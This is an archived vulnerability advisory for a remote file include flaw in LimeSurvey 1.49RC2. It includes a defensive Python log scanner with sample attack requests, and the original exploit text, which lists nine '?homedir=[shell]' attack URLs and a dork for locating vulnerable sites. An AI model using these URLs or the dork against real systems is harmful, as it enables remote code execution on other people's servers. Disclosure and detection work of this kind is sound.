Vendor: PHPSurveyor
By: Pr0T3cT10n
CVSS: 7.5 (HIGH)
CWE: RFI (Remote File Include)
Product Name: PHPSurveyor
Affected Version From: 1.49RC2
Affected Version To: 1.49RC2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

LimeSurvey (PHPSurveyor) RFI (Remote File Include) Vulnerability

LimeSurvey (PHPSurveyor) version 1.49RC2 contains a Remote File Include (RFI) vulnerability. It is present in multiple files, including /admin/classes/pear/OLE/PPS/File.php, /admin/classes/pear/OLE/PPS/Root.php, /admin/classes/pear/Spreadsheet/Excel/Writer.php, /admin/classes/pear/OLE/PPS.php, /admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php, /admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php, /admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php, /admin/classes/pear/Spreadsheet/Excel/Writer/Format.php, and /admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php. An attacker can exploit it by including a remote file through the homedir parameter in the URL.

Mitigation:

To mitigate this vulnerability, it is recommended to update the LimeSurvey (PHPSurveyor) script to a secure version that addresses the Remote File Include (RFI) vulnerability.
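For sites still running the affected version, the following added example (not part of the advisory or of LimeSurvey) scans web server access logs for requests to the listed scripts that carry a homedir parameter. It assumes Apache/nginx combined log format; the function names `classify` and `scan` and the sample lines are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote

# Script paths listed in the advisory, relative to the install root.
AFFECTED = tuple("/admin/classes/pear/" + p for p in (
    "OLE/PPS/File.php", "OLE/PPS/Root.php", "OLE/PPS.php",
    "Spreadsheet/Excel/Writer.php", "Spreadsheet/Excel/Writer/Worksheet.php",
    "Spreadsheet/Excel/Writer/Parser.php", "Spreadsheet/Excel/Writer/Workbook.php",
    "Spreadsheet/Excel/Writer/Format.php", "Spreadsheet/Excel/Writer/BIFFwriter.php",
))
# Combined log format: client ... "METHOD target PROTO" status
LINE = re.compile(r'^(?P<client>\S+) .*?"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Values naming a URL, stream wrapper, protocol-relative or UNC location.
REMOTE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]+:|//|\\\\)', re.I)

def classify(line):
    """Return None, or (client, script, verdict, status) for a flagged request."""
    m = LINE.match(line)
    if not m:
        return None
    raw_path, _, query = m["target"].partition("?")
    # Decode and normalise so percent-encoded or dotted paths still match.
    path = posixpath.normpath(unquote(raw_path)).lower()
    script = next((s for s in AFFECTED if path.endswith(s.lower())), None)
    values = parse_qs(query, keep_blank_values=True).get("homedir")
    if script is None or values is None:
        return None
    remote = any(REMOTE.match(v) for v in values)
    verdict = "remote-include-attempt" if remote else "homedir-supplied"
    return m["client"], script, verdict, int(m["status"])

# Constructed sample lines (documentation address ranges, not real traffic).
SAMPLE = [
    '203.0.113.5 - - [06/Jul/2007:10:00:00 +0000] "GET /survey/admin/classes/pear/OLE/PPS/File.php?homedir=http://198.51.100.7/inc.txt? HTTP/1.1" 200 512',
    '198.51.100.23 - - [06/Jul/2007:10:01:00 +0000] "GET /admin/classes/pear/Spreadsheet/Excel/Writer/Format.php?homedir=http%3A%2F%2F198.51.100.7%2Finc.txt HTTP/1.0" 404 209',
    '192.0.2.44 - - [06/Jul/2007:10:02:00 +0000] "GET /survey/admin/classes/pear/OLE/PPS.php?homedir=/var/www/survey HTTP/1.1" 200 0',
    '192.0.2.44 - - [06/Jul/2007:10:03:00 +0000] "GET /survey/admin/classes/pear/OLE/PPS.php HTTP/1.1" 200 0',
    '192.0.2.44 - - [06/Jul/2007:10:04:00 +0000] "GET /survey/index.php?sid=1 HTTP/1.1" 200 4096',
]

def scan(lines):
    return [hit for hit in map(classify, lines) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(*hit, sep="\t")
```

A flagged request with a 200 status deserves closer review than a 404, since the script was reached; the library files under /admin/classes/pear/ have no reason to be requested directly at all.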

Exploit-DB raw data:

## Owner : Pr0T3cT10n
## Email : Pr0T3cT10n@Gmail.Com
## Homepage : www.kamikaz-team.com
## Script site : www.limesurvey.org
## Script name : LimeSurvey (PHPSurveyor)
## Version : 1.49RC2
## Type : RFI(Remote File Include)
## Source : http://sourceforge.net/project/showfiles.php?group_id=74605
## D0rk : "You have not provided a survey identification number"

## Bug :
	## Files :
		## /admin/classes/pear/OLE/PPS/File.php
		## /admin/classes/pear/OLE/PPS/Root.php
		## /admin/classes/pear/Spreadsheet/Excel/Writer.php
		## /admin/classes/pear/OLE/PPS.php
		## /admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php
		## /admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php
		## /admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php
		## /admin/classes/pear/Spreadsheet/Excel/Writer/Format.php
		## /admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php

## Exploit :
		## /admin/classes/pear/OLE/PPS/File.php?homedir=[shell]
		## /admin/classes/pear/OLE/PPS/Root.php?homedir=[shell]
		## /admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir=[shell]
		## /admin/classes/pear/OLE/PPS.php?homedir=[shell]
		## /admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir=[shell]
		## /admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php?homedir=[shell]
		## /admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php?homedir=[shell]
		## /admin/classes/pear/Spreadsheet/Excel/Writer/Format.php?homedir=[shell]
		## /admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php?homedir=[shell]
		
## Thanks : str0ke

# milw0rm.com [2007-07-06]